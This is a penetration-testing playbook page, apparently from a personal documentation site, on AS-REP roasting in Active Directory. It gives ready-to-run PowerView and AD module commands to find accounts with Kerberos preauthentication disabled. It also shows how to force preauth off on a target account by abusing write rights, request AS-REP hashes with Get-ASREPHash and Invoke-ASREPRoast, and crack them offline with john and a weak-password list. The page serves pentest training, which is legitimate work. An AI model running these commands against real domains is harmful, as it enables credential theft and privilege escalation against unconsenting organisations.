> For the complete documentation index, see [llms.txt](https://playbook.sidthoviti.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/targeted-kerberoasting/as-rep-roast.md).

# AS-REP Roast

<figure><img src="/files/YidU6IkScr1QNgcY9HrH" alt=""><figcaption></figcaption></figure>

### Targeted Kerberoasting - AS-REPs

* If a user's UAC setting has preauthentication disabled, then it is possible to grab user's crackable AS-REP (Authentication Service Response) and bruteforce it offline.
* With GenericWrite or GenericAll rights, Kerberos preauth can be forced disabled as well.

Enumerate accounts with Kerberos Preauth disabled:

{% code overflow="wrap" %}

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

{% endcode %}

Force disable Kerberos Preauth and enumerate the permissions for RDPUsers on ACL using PowerView

{% code overflow="wrap" %}

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Verbose
```

{% endcode %}

Request encrypted AS-REP for offline bruteforce.

Let's use ASREPRoast

{% code overflow="wrap" %}

```powershell
Get-ASREPHash -UserName VPN1user -Verbose
```

{% endcode %}

To enumerate all users with Kerberos preauth disabled and request a hash:

```powershell
Invoke-ASREPRoast -Verbose
```

Finally, crack the hashes offline:

{% code overflow="wrap" %}

```
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-
pass.txt C:\AD\Tools\asrephashes.txt
```

{% endcode %}
